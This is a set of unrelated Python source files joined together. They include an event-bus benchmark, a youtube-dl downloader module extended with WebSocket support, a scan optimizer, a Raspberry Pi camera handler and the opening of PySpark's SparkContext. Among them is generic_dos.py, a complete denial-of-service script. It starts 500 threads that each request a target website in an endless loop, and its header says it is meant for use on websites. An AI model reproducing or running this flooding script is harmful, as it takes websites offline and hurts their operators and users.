logger = logging.getLogger("lahja.tools.benchmark.process.ConsumerProcess")
def __init__(self, name: str, config: ConsumerConfig) -> None:
self._name = name
self._config = config
self._process: Optional[multiprocessing.Process] = None
def start(self) -> None:
self._process = multiprocessing.Process(
target=self.launch, args=(self._name, self._config)
)
self._process.start()
@classmethod
def launch(cls, name: str, config: ConsumerConfig) -> None:
if config.debug_logging:
setup_stderr_lahja_logging()
config.backend.run(cls.worker, name, config)
@classmethod
async def worker(cls, name: str, config: ConsumerConfig) -> None:
conn_config = ConnectionConfig.from_name(name)
async with config.backend.Endpoint.serve(conn_config) as event_bus:
await event_bus.connect_to_endpoints(
ConnectionConfig.from_name(REPORTER_ENDPOINT)
)
await event_bus.wait_until_connected_to(DRIVER_ENDPOINT)
stats = await cls.do_consumer(event_bus, config)
await event_bus.wait_until_endpoint_subscribed_to(
REPORTER_ENDPOINT, TotalRecordedEvent
)
await event_bus.broadcast(
TotalRecordedEvent(stats.crunch(event_bus.name)),
BroadcastConfig(filter_endpoint=REPORTER_ENDPOINT),
)
@staticmethod
@abstractmethod
async def do_consumer(
event_bus: EndpointAPI, config: ConsumerConfig
) -> LocalStatistic:
...
class BroadcastConsumer(BaseConsumerProcess):
@staticmethod
async def do_consumer(
event_bus: EndpointAPI, config: ConsumerConfig
) -> LocalStatistic:
stats = LocalStatistic()
events = event_bus.stream(PerfMeasureEvent, num_events=config.num_events)
async for event in events:
stats.add(RawMeasureEntry(sent_at=event.sent_at, received_at=time.time()))
return stats
class RequestConsumer(BaseConsumerProcess):
@staticmethod
async def do_consumer(
event_bus: EndpointAPI, config: ConsumerConfig
) -> LocalStatistic:
stats = LocalStatistic()
events = event_bus.stream(PerfMeasureRequest, num_events=config.num_events)
async for event in events:
await event_bus.broadcast(PerfMeasureResponse(), event.broadcast_config())
stats.add(RawMeasureEntry(sent_at=event.sent_at, received_at=time.time()))
return stats
class ReportingProcessConfig(NamedTuple):
num_processes: int
num_events: int
throttle: float
payload_bytes: int
backend: BaseBackend
debug_logging: bool
class ReportingProcess:
logger = logging.getLogger("lahja.tools.benchmark.process.ReportingProcess")
def __init__(self, config: ReportingProcessConfig) -> None:
self._name = REPORTER_ENDPOINT
self._config = config
self._process: Optional[multiprocessing.Process] = None
def start(self) -> None:
self._process = multiprocessing.Process(
target=self.launch, args=(self._config,)
)
self._process.start()
@classmethod
def launch(cls, config: ReportingProcessConfig) -> None:
if config.debug_logging:
setup_stderr_lahja_logging()
logging.basicConfig(level=logging.INFO, format="%(message)s")
logger = logging.getLogger("reporting")
config.backend.run(ReportingProcess.worker, logger, config)
@staticmethod
async def worker(logger: logging.Logger, config: ReportingProcessConfig) -> None:
conn_config = ConnectionConfig.from_name(REPORTER_ENDPOINT)
async with config.backend.Endpoint.serve(conn_config) as event_bus:
await event_bus.connect_to_endpoints(
ConnectionConfig.from_name(ROOT_ENDPOINT)
)
global_statistic = GlobalStatistic()
events = event_bus.stream(
TotalRecordedEvent, num_events=config.num_processes
)
async for event in events:
global_statistic.add(event.total)
print_full_report(
logger,
config.backend,
config.num_processes,
config.num_events,
global_statistic,
)
await event_bus.broadcast(
ShutdownEvent(), BroadcastConfig(filter_endpoint=ROOT_ENDPOINT)
)
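# Hedged aside (not part of the benchmark suite): the start()/stop() pattern
# used by BaseDriverProcess boils down to a daemon Process that is first asked
# to exit via SIGINT and only terminated if join() times out. A stdlib-only
# sketch of the same shutdown sequence:
#
#     import multiprocessing, os, signal, time
#
#     def _loop():
#         try:
#             while True:
#                 time.sleep(0.1)
#         except KeyboardInterrupt:
#             pass
#
#     proc = multiprocessing.Process(target=_loop, daemon=True)
#     proc.start()
#     os.kill(proc.pid, signal.SIGINT)  # ask politely first
#     proc.join(1)
#     if proc.is_alive():
#         proc.terminate()              # fall back to SIGTERM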
|
external.py
|
from __future__ import unicode_literals
import os.path
import re
import subprocess
import sys
import time
import websocket
from threading import Thread
from docs.conf import templates_path
from .common import FileDownloader
from ..compat import (
compat_setenv,
compat_str,
)
from ..postprocessor.ffmpeg import FFmpegPostProcessor, EXT_TO_OUT_FORMATS
from ..utils import (
cli_option,
cli_valueless_option,
cli_bool_option,
cli_configuration_args,
encodeFilename,
encodeArgument,
handle_youtubedl_headers,
check_executable,
is_outdated_version,
)
class ExternalFD(FileDownloader):
def real_download(self, filename, info_dict):
self.report_destination(filename)
tmpfilename = self.temp_name(filename)
try:
started = time.time()
retval = self._call_downloader(tmpfilename, info_dict)
except KeyboardInterrupt:
if not info_dict.get('is_live'):
raise
# Live stream downloading cancellation should be considered as
# correct and expected termination thus all postprocessing
# should take place
retval = 0
self.to_screen('[%s] Interrupted by user' % self.get_basename())
if retval == 0:
status = {
'filename': filename,
'status': 'finished',
'elapsed': time.time() - started,
}
if filename != '-':
fsize = os.path.getsize(encodeFilename(tmpfilename))
self.to_screen('\r[%s] Downloaded %s bytes' % (self.get_basename(), fsize))
self.try_rename(tmpfilename, filename)
status.update({
'downloaded_bytes': fsize,
'total_bytes': fsize,
})
self._hook_progress(status)
return True
else:
self.to_stderr('\n')
self.report_error('%s exited with code %d' % (
self.get_basename(), retval))
return False
@classmethod
def get_basename(cls):
return cls.__name__[:-2].lower()
@property
def exe(self):
return self.params.get('external_downloader')
@classmethod
def available(cls):
return check_executable(cls.get_basename(), [cls.AVAILABLE_OPT])
@classmethod
def supports(cls, info_dict):
return info_dict['protocol'] in ('http', 'https', 'ftp', 'ftps')
@classmethod
def can_download(cls, info_dict):
return cls.available() and cls.supports(info_dict)
def _option(self, command_option, param):
return cli_option(self.params, command_option, param)
def _bool_option(self, command_option, param, true_value='true', false_value='false', separator=None):
return cli_bool_option(self.params, command_option, param, true_value, false_value, separator)
def _valueless_option(self, command_option, param, expected_value=True):
return cli_valueless_option(self.params, command_option, param, expected_value)
def _configuration_args(self, default=[]):
return cli_configuration_args(self.params, 'external_downloader_args', default)
def _call_downloader(self, tmpfilename, info_dict):
""" Either overwrite this or implement _make_cmd """
cmd = [encodeArgument(a) for a in self._make_cmd(tmpfilename, info_dict)]
self._debug_cmd(cmd)
p = subprocess.Popen(
cmd, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if p.returncode != 0:
self.to_stderr(stderr.decode('utf-8', 'replace'))
return p.returncode
class CurlFD(ExternalFD):
AVAILABLE_OPT = '-V'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '--location', '-o', tmpfilename]
for key, val in info_dict['http_headers'].items():
cmd += ['--header', '%s: %s' % (key, val)]
cmd += self._bool_option('--continue-at', 'continuedl', '-', '0')
cmd += self._valueless_option('--silent', 'noprogress')
cmd += self._valueless_option('--verbose', 'verbose')
cmd += self._option('--limit-rate', 'ratelimit')
retry = self._option('--retry', 'retries')
if len(retry) == 2:
if retry[1] in ('inf', 'infinite'):
retry[1] = '2147483647'
cmd += retry
cmd += self._option('--max-filesize', 'max_filesize')
cmd += self._option('--interface', 'source_address')
cmd += self._option('--proxy', 'proxy')
cmd += self._valueless_option('--insecure', 'nocheckcertificate')
cmd += self._configuration_args()
cmd += ['--', info_dict['url']]
return cmd
def _call_downloader(self, tmpfilename, info_dict):
cmd = [encodeArgument(a) for a in self._make_cmd(tmpfilename, info_dict)]
self._debug_cmd(cmd)
# curl writes the progress to stderr so don't capture it.
p = subprocess.Popen(cmd)
p.communicate()
return p.returncode
class AxelFD(ExternalFD):
AVAILABLE_OPT = '-V'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '-o', tmpfilename]
for key, val in info_dict['http_headers'].items():
cmd += ['-H', '%s: %s' % (key, val)]
cmd += self._configuration_args()
cmd += ['--', info_dict['url']]
return cmd
class WgetFD(ExternalFD):
AVAILABLE_OPT = '--version'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '-O', tmpfilename, '-nv', '--no-cookies']
for key, val in info_dict['http_headers'].items():
cmd += ['--header', '%s: %s' % (key, val)]
cmd += self._option('--limit-rate', 'ratelimit')
retry = self._option('--tries', 'retries')
if len(retry) == 2:
if retry[1] in ('inf', 'infinite'):
retry[1] = '0'
cmd += retry
cmd += self._option('--bind-address', 'source_address')
cmd += self._option('--proxy', 'proxy')
cmd += self._valueless_option('--no-check-certificate', 'nocheckcertificate')
cmd += self._configuration_args()
cmd += ['--', info_dict['url']]
return cmd
class Aria2cFD(ExternalFD):
AVAILABLE_OPT = '-v'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '-c']
cmd += self._configuration_args([
'--min-split-size', '1M', '--max-connection-per-server', '4'])
dn = os.path.dirname(tmpfilename)
if dn:
cmd += ['--dir', dn]
cmd += ['--out', os.path.basename(tmpfilename)]
for key, val in info_dict['http_headers'].items():
cmd += ['--header', '%s: %s' % (key, val)]
cmd += self._option('--interface', 'source_address')
cmd += self._option('--all-proxy', 'proxy')
cmd += self._bool_option('--check-certificate', 'nocheckcertificate', 'false', 'true', '=')
cmd += self._bool_option('--remote-time', 'updatetime', 'true', 'false', '=')
cmd += ['--', info_dict['url']]
return cmd
class HttpieFD(ExternalFD):
@classmethod
def available(cls):
return check_executable('http', ['--version'])
def _make_cmd(self, tmpfilename, info_dict):
cmd = ['http', '--download', '--output', tmpfilename, info_dict['url']]
for key, val in info_dict['http_headers'].items():
cmd += ['%s:%s' % (key, val)]
return cmd
class WebSocketAppDownloader(websocket.WebSocketApp):
    outputfile = None
    def setOutputFile(self, output):
        self.outputfile = output
def on_error_downloader(wsr, error):
print(error)
def on_close_downloader(wsr, close_status_code, close_reason):
    print(close_reason)
    print(close_status_code)
    wsr.outputfile.close()
    print("### closed ###")
def on_message_downloader(wsr, message):
    if not (message[0] == '{' and message[-1] == '}'):
        wsr.outputfile.write(message)
class WebSocketFD(ExternalFD):
@classmethod
def supports(cls, info_dict):
        return info_dict['protocol'] in ('wss',)
@classmethod
def available(cls):
return FFmpegPostProcessor().available
def _call_downloader(self, tmpfilename, info_dict):
wsurl = info_dict['url']
        protocol = info_dict.get('protocol')  # useless, as protocol can be anything
        auxprotocols = info_dict.get('auxprotocols')  # other wss protocols containing (url and callbacks)
        wsauxapps = []
if auxprotocols:
for auxproto in auxprotocols:
wsapp = websocket.WebSocketApp(wsurl,
header=auxproto.headers,
on_open=auxproto.on_open,
on_message=auxproto.on_message,
on_error=auxproto.on_error,
on_close=auxproto.on_close)
wsauxapps.append(wsapp);
for wsapp in wsauxapps:
def arun(*args):
wsapp.run_forever()
Thread(target=arun).start()
args=[]
for log_level in ('quiet', 'verbose'):
if self.params.get(log_level, False):
args += ['-loglevel', log_level]
break
seekable = info_dict.get('_seekable')
if seekable is not None:
# setting -seekable prevents ffmpeg from guessing if the server
# supports seeking(by adding the header `Range: bytes=0-`), which
# can cause problems in some cases
# https://github.com/ytdl-org/youtube-dl/issues/11800#issuecomment-275037127
# http://trac.ffmpeg.org/ticket/6125#comment:10
args += ['-seekable', '1' if seekable else '0']
args += self._configuration_args()
# start_time = info_dict.get('start_time') or 0
# if start_time:
# args += ['-ss', compat_str(start_time)]
# end_time = info_dict.get('end_time')
# if end_time:
# args += ['-t', compat_str(end_time - start_time)]
if info_dict['http_headers'] and re.match(r'^https?://', wsurl):
# Trailing \r\n after each HTTP header is important to prevent warning from ffmpeg/avconv:
# [http @ 00000000003d2fa0] No trailing CRLF found in HTTP header.
headers = handle_youtubedl_headers(info_dict['http_headers'])
args += [
'-headers',
''.join('%s: %s\r\n' % (key, val) for key, val in headers.items())]
env = None
proxy = self.params.get('proxy')
if proxy:
if not re.match(r'^[\da-zA-Z]+://', proxy):
proxy = 'http://%s' % proxy
if proxy.startswith('socks'):
self.report_warning(
'%s does not support SOCKS proxies. Downloading is likely to fail. '
'Consider adding --hls-prefer-native to your command.' % self.get_basename())
# Since December 2015 ffmpeg supports -http_proxy option (see
# http://git.videolan.org/?p=ffmpeg.git;a=commit;h=b4eb1f29ebddd60c41a2eb39f5af701e38e0d3fd)
# We could switch to the following code if we are able to detect version properly
# args += ['-http_proxy', proxy]
env = os.environ.copy()
compat_setenv('HTTP_PROXY', proxy, env=env)
compat_setenv('http_proxy', proxy, env=env)
protocol = info_dict.get('protocol')
if protocol == 'rtmp':
player_url = info_dict.get('player_url')
page_url = info_dict.get('page_url')
app = info_dict.get('app')
play_path = info_dict.get('play_path')
tc_url = info_dict.get('tc_url')
flash_version = info_dict.get('flash_version')
live = info_dict.get('rtmp_live', False)
conn = info_dict.get('rtmp_conn')
if player_url is not None:
args += ['-rtmp_swfverify', player_url]
if page_url is not None:
args += ['-rtmp_pageurl', page_url]
if app is not None:
args += ['-rtmp_app', app]
if play_path is not None:
args += ['-rtmp_playpath', play_path]
if tc_url is not None:
args += ['-rtmp_tcurl', tc_url]
if flash_version is not None:
args += ['-rtmp_flashver', flash_version]
if live:
args += ['-rtmp_live', 'live']
if isinstance(conn, list):
for entry in conn:
args += ['-rtmp_conn', entry]
elif isinstance(conn, compat_str):
args += ['-rtmp_conn', conn]
args += ['-i', wsurl, '-c', 'copy']
if self.params.get('test', False):
args += ['-fs', compat_str(self._TEST_FILE_SIZE)]
# if protocol in ('m3u8', 'm3u8_native'):
# if self.params.get('hls_use_mpegts', False) or tmpfilename == '-':
# args += ['-f', 'mpegts']
# else:
# args += ['-f', 'mp4']
# if (ffpp.basename == 'ffmpeg' and is_outdated_version(ffpp._versions['ffmpeg'], '3.2', False)) and (not info_dict.get('acodec') or info_dict['acodec'].split('.')[0] in ('aac', 'mp4a')):
# args += ['-bsf:a', 'aac_adtstoasc']
# elif protocol == 'rtmp':
# args += ['-f', 'flv']
# else:
# args += ['-f', EXT_TO_OUT_FORMATS.get(info_dict['ext'], info_dict['ext'])]
#
# args = [encodeArgument(opt) for opt in args]
# args.append(encodeFilename(ffpp._ffmpeg_filename_argument(tmpfilename), True))
self._debug_cmd(args)
#websocket.enableTrace(True)
wsappmain = WebSocketAppDownloader(wsurl,header=
["User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",
"Accept: */*",
"Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding: gzip, deflate, br",
#"Sec-WebSocket-Version: 13",
#"Origin: https://www.livejasmin.com",
#"Sec-WebSocket-Extensions: permessage-deflate",
#"Sec-WebSocket-Key: gsVFAaMTdf8HW8pI/f9FhA==",
"Connection: keep-alive, Upgrade",
"Sec-Fetch-Dest: websocket",
"Sec-Fetch-Mode: websocket",
"Sec-Fetch-Site: cross-site",
"Pragma: no-cache",
"Cache-Control: no-cache",
"Upgrade: websocket"])
wsappmain.outputfile = open(tmpfilename, 'wb')
        if info_dict.get('on_open'):
            wsappmain.on_open = info_dict['on_open']
        if info_dict.get('on_error'):
            wsappmain.on_error = info_dict['on_error']
        else:
            wsappmain.on_error = on_error_downloader
        if info_dict.get('on_close'):
            wsappmain.on_close = info_dict['on_close']
        else:
            wsappmain.on_close = on_close_downloader
        if info_dict.get('on_message'):
            wsappmain.on_message = info_dict['on_message']
        else:
            wsappmain.on_message = on_message_downloader
#wsappmain.on_open =info_dict['on_open']
# def darun(*args):
# Thread(target=darun).start()
        try:
            wsappmain.run_forever()
        except:
            # Any error raised while streaming (network failure, interruption)
            # is swallowed here and only reported, so the partial file is kept.
            self.to_stderr('wsappmain closed')
            # raise
return True
class FFmpegFD(ExternalFD):
@classmethod
def supports(cls, info_dict):
return info_dict['protocol'] in ('http', 'https', 'ftp', 'ftps', 'm3u8', 'rtsp', 'rtmp', 'mms')
@classmethod
def available(cls):
return FFmpegPostProcessor().available
def _call_downloader(self, tmpfilename, info_dict):
url = info_dict['url']
ffpp = FFmpegPostProcessor(downloader=self)
if not ffpp.available:
self.report_error('m3u8 download detected but ffmpeg or avconv could not be found. Please install one.')
return False
ffpp.check_version()
args = [ffpp.executable, '-y']
for log_level in ('quiet', 'verbose'):
if self.params.get(log_level, False):
args += ['-loglevel', log_level]
break
seekable = info_dict.get('_seekable')
if seekable is not None:
# setting -seekable prevents ffmpeg from guessing if the server
# supports seeking(by adding the header `Range: bytes=0-`), which
# can cause problems in some cases
# https://github.com/ytdl-org/youtube-dl/issues/11800#issuecomment-275037127
# http://trac.ffmpeg.org/ticket/6125#comment:10
args += ['-seekable', '1' if seekable else '0']
args += self._configuration_args()
# start_time = info_dict.get('start_time') or 0
# if start_time:
# args += ['-ss', compat_str(start_time)]
# end_time = info_dict.get('end_time')
# if end_time:
# args += ['-t', compat_str(end_time - start_time)]
if info_dict['http_headers'] and re.match(r'^https?://', url):
# Trailing \r\n after each HTTP header is important to prevent warning from ffmpeg/avconv:
# [http @ 00000000003d2fa0] No trailing CRLF found in HTTP header.
headers = handle_youtubedl_headers(info_dict['http_headers'])
args += [
'-headers',
''.join('%s: %s\r\n' % (key, val) for key, val in headers.items())]
env = None
proxy = self.params.get('proxy')
if proxy:
if not re.match(r'^[\da-zA-Z]+://', proxy):
proxy = 'http://%s' % proxy
if proxy.startswith('socks'):
self.report_warning(
'%s does not support SOCKS proxies. Downloading is likely to fail. '
'Consider adding --hls-prefer-native to your command.' % self.get_basename())
# Since December 2015 ffmpeg supports -http_proxy option (see
# http://git.videolan.org/?p=ffmpeg.git;a=commit;h=b4eb1f29ebddd60c41a2eb39f5af701e38e0d3fd)
# We could switch to the following code if we are able to detect version properly
# args += ['-http_proxy', proxy]
env = os.environ.copy()
compat_setenv('HTTP_PROXY', proxy, env=env)
compat_setenv('http_proxy', proxy, env=env)
protocol = info_dict.get('protocol')
if protocol == 'rtmp':
player_url = info_dict.get('player_url')
page_url = info_dict.get('page_url')
app = info_dict.get('app')
play_path = info_dict.get('play_path')
tc_url = info_dict.get('tc_url')
flash_version = info_dict.get('flash_version')
live = info_dict.get('rtmp_live', False)
conn = info_dict.get('rtmp_conn')
if player_url is not None:
args += ['-rtmp_swfverify', player_url]
if page_url is not None:
args += ['-rtmp_pageurl', page_url]
if app is not None:
args += ['-rtmp_app', app]
if play_path is not None:
args += ['-rtmp_playpath', play_path]
if tc_url is not None:
args += ['-rtmp_tcurl', tc_url]
if flash_version is not None:
args += ['-rtmp_flashver', flash_version]
if live:
args += ['-rtmp_live', 'live']
if isinstance(conn, list):
for entry in conn:
args += ['-rtmp_conn', entry]
elif isinstance(conn, compat_str):
args += ['-rtmp_conn', conn]
args += ['-i', url, '-c', 'copy']
if self.params.get('test', False):
args += ['-fs', compat_str(self._TEST_FILE_SIZE)]
if protocol in ('m3u8', 'm3u8_native'):
if self.params.get('hls_use_mpegts', False) or tmpfilename == '-':
args += ['-f', 'mpegts']
else:
args += ['-f', 'mp4']
if (ffpp.basename == 'ffmpeg' and is_outdated_version(ffpp._versions['ffmpeg'], '3.2', False)) and (not info_dict.get('acodec') or info_dict['acodec'].split('.')[0] in ('aac', 'mp4a')):
args += ['-bsf:a', 'aac_adtstoasc']
elif protocol == 'rtmp':
args += ['-f', 'flv']
else:
args += ['-f', EXT_TO_OUT_FORMATS.get(info_dict['ext'], info_dict['ext'])]
args = [encodeArgument(opt) for opt in args]
args.append(encodeFilename(ffpp._ffmpeg_filename_argument(tmpfilename), True))
self._debug_cmd(args)
proc = subprocess.Popen(args, stdin=subprocess.PIPE, env=env)
try:
retval = proc.wait()
except KeyboardInterrupt:
            # subprocess.run would send the SIGKILL signal to ffmpeg and the
# mp4 file couldn't be played, but if we ask ffmpeg to quit it
# produces a file that is playable (this is mostly useful for live
# streams). Note that Windows is not affected and produces playable
# files (see https://github.com/ytdl-org/youtube-dl/issues/8300).
if sys.platform != 'win32':
proc.communicate(b'q')
raise
return retval
class AVconvFD(FFmpegFD):
pass
_BY_NAME = dict(
(klass.get_basename(), klass)
for name, klass in globals().items()
if name.endswith('FD') and name != 'ExternalFD'
)
def list_external_downloaders():
return sorted(_BY_NAME.keys())
def get_external_downloader(external_downloader):
""" Given the name of the executable, see whether we support the given
downloader . """
# Drop .exe extension on Windows
bn = os.path.splitext(os.path.basename(external_downloader))[0]
return _BY_NAME[bn]
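# Hedged usage sketch (not part of the original module): lookups go through the
# lowercased class basename, with any Windows ".exe" suffix stripped first.
#
#     list_external_downloaders()                    # sorted basenames, e.g. ['aria2c', 'avconv', ...]
#     get_external_downloader('aria2c') is Aria2cFD  # True
#     get_external_downloader('wget.exe') is WgetFD  # True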
|
scanning.py
|
"""Multidimensional Simple Scan method for Minimization."""
from threading import Thread as _Thread
import numpy as _np
class SimpleScan:
"""."""
@property
def ndim(self):
"""."""
return self._ndim
@ndim.setter
def ndim(self, value):
"""."""
self._ndim = value
@property
def position(self):
"""."""
return self._position
@position.setter
def position(self, value):
"""."""
self._position = value
def __init__(self):
"""."""
self._lower_limits = _np.array([])
self._upper_limits = _np.array([])
self._ndim = 0
self._position = _np.array([])
self._delta = _np.array([])
self._curr_dim = 0
self._stop = False
self._thread = _Thread(target=self._optimize, daemon=True)
self.initialization()
def initialization(self):
"""."""
raise NotImplementedError
def calc_obj_fun(self):
"""Return arrays with dimension of search space."""
raise NotImplementedError
def set_limits(self, upper=None, lower=None):
"""."""
self._upper_limits = upper
self._lower_limits = lower
self.ndim = len(upper)
def start(self):
"""."""
if not self._thread.is_alive():
self._stop = False
self._thread = _Thread(target=self._optimize, daemon=True)
self._thread.start()
def stop(self):
"""."""
self._stop = True
@property
def isrunning(self):
"""."""
return self._thread.is_alive()
def _optimize(self, npoints):
"""."""
self._delta = _np.zeros(npoints)
func = _np.zeros(self._ndim)
best = _np.zeros(self._ndim)
for i in range(self._ndim):
self._delta = _np.linspace(
self._lower_limits[i], self._upper_limits[i], npoints)
self._curr_dim = i
func[i], best[i] = self.calc_obj_fun()
self._position[i] = best[i]
print('Best result is: ' + str(best))
print('Figure of merit is: ' + str(_np.min(func)))
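# Hedged usage sketch (not part of the original module): a concrete subclass
# supplies initialization() and calc_obj_fun(); calc_obj_fun() is expected to
# return the best objective value along the current axis (self._delta) and the
# position at which it occurs. Note that start() spawns _optimize without the
# npoints argument it requires, so the sketch calls _optimize directly.
#
#     class QuadraticScan(SimpleScan):
#         def initialization(self):
#             self.set_limits(upper=_np.array([2.0, 2.0]),
#                             lower=_np.array([-2.0, -2.0]))
#             self.position = _np.zeros(self.ndim)
#         def calc_obj_fun(self):
#             vals = self._delta ** 2  # distance to the origin on this axis
#             idx = int(_np.argmin(vals))
#             return vals[idx], self._delta[idx]
#
#     scan = QuadraticScan()
#     scan._optimize(npoints=21)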
|
CameraHandler.py
|
import time
from picamera import PiCamera
from picamera.array import PiRGBArray
import threading
import multiprocessing
import struct
from Queue import Queue
from datetime import datetime
import logging
import numpy as np
import os
class CameraHandler(multiprocessing.Process):
m = multiprocessing.Manager()
queueHandler = m.Queue()
running = False
noOfPhotosPerCMD = 1
def __init__(self, queueJob, header, sendCam, runID, algoVer):
self.algoVer = algoVer
self.runID = runID
self.sendCam = sendCam
self.logger = logging.getLogger(__name__)
multiprocessing.Process.__init__(self)
self.header = header
self.queueJob = queueJob
self.logger.info("CameraManager started")
self.daemon = True
self.start()
def run(self):
self.camera = PiCamera()
self.camera.framerate = 30
self.camera.image_effect = "denoise"
self.camera.exposure_mode = "antishake"
self.camera.start_preview()
self.logger.info("Warming up camera...")
t3 = threading.Thread(target=self.handleProcessor, args=())
t3.start()
t3.join()
def getPacketHeader(self):
return self.header
def handleProcessor(self):
while True:
if self.queueHandler.qsize() != 0:
print("In If statement")
packet = "R:cam:2:18:1"
print(packet)
if packet.split(":")[0] != "R" and packet.split(":")[1] != "cam":
print("error in packet")
self.logger.error("packet with error, skip this packet" + packet)
self.queueHandler.task_done()
else:
print("Cam packet received")
try:
print(packet)
x, y, direction = (
packet.split(":")[2],
packet.split(":")[3],
packet.split(":")[4].strip(),
)
self.logger.info(
"[raspberry] camera is dealing with" + packet + " - right now"
)
if self.running:
self.logger.warn(
"[raspberry][warning] cam still busy, packet ignored"
)
elif not self.running:
self.running = True
if self.algoVer == 1:
for i in range(self.noOfPhotosPerCMD):
now = datetime.now()
fileNameCustom = (
"checklist-images/"
+ now.strftime("%Y%m%d_%H%M%S")
+ "-"
+ x
+ "_"
+ y
+ "_"
+ direction
+ "_("
+ str(i)
+ ").jpg"
)
fileCustom = open(fileNameCustom, "wb")
fileCustom.close()
self.camera.capture(fileNameCustom)
self.logger.info(
"[raspberry] taken %s" % fileNameCustom
)
newFilePath = fileNameCustom.replace("-temp", "")
os.rename(fileNameCustom, newFilePath)
self.logger.info("[raspberry] changing to %s" % newFilePath)
elif self.algoVer == 2:
now = datetime.now()
filepath = (
"checklist-images/"
+ now.strftime("%Y%m%d_%H%M%S")
+ ".jpg"
)
fileCustom = open(filepath, "wb")
self.camera.capture(fileCustom, "jpeg")
fileCustom.close()
self.logger.info("[raspberry] taken %s" % filepath)
self.queueJob.put(
self.header
+ ":D:save_image:"
+ filepath
+ ":"
+ x
+ ":"
+ y
+ ":"
+ direction
)
self.running = False
except Exception as e:
self.logger.error("[raspberry][error] " + str(e))
self.logger.info("error so skip this image")
finally:
self.running = False
if self.sendCam:
self.queueJob.put(self.header + ":A:cam_ok")
def handle(self, packet):
self.queueHandler.put(packet)
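# Hedged usage sketch (not part of the original module, values are placeholders):
# packets follow a "R:cam:<x>:<y>:<direction>" layout; handle() only enqueues
# them (note that handleProcessor() as written substitutes a hard-coded test
# packet before parsing).
#
#     jobQueue = multiprocessing.Manager().Queue()  # hypothetical job queue
#     cam = CameraHandler(jobQueue, header="H1", sendCam=True, runID=0, algoVer=2)
#     cam.handle("R:cam:2:18:1")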
|
generic_dos.py
|
#!/usr/bin/python3
# author Diego Rodríguez Riera
# from https://github.com/riera90/scripts
# licenced under BSD 3-Clause License
# date 18/02/19
# Intended to be used on websites, what else would you use this for...
import requests
import re
import json
import threading
import time
import os
################################################################################
############################### Configuration ##################################
################################################################################
number_of_threads = 500
# target login
target = "http://www.site.com"
# target username and password input
################################################################################
########################### end of Configuration ###############################
################################################################################
# this function hammers the target with GET requests in an endless loop
def make_request():
    # creates the session (mainly to store cookies)
bot = requests.session()
thread_name = threading.currentThread().getName()
# here we go
while True:
# makes the GET
bot.get(url = target)
# creates the threads
print("initializing threads.")
threads = []
for i in range(number_of_threads):
t = threading.Thread(target=make_request, name='thread '+str(i))
threads.append(t)
# launches the threads
for thread in threads:
thread.start()
time.sleep(2)
# joins the threads
for thread in threads:
thread.join()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
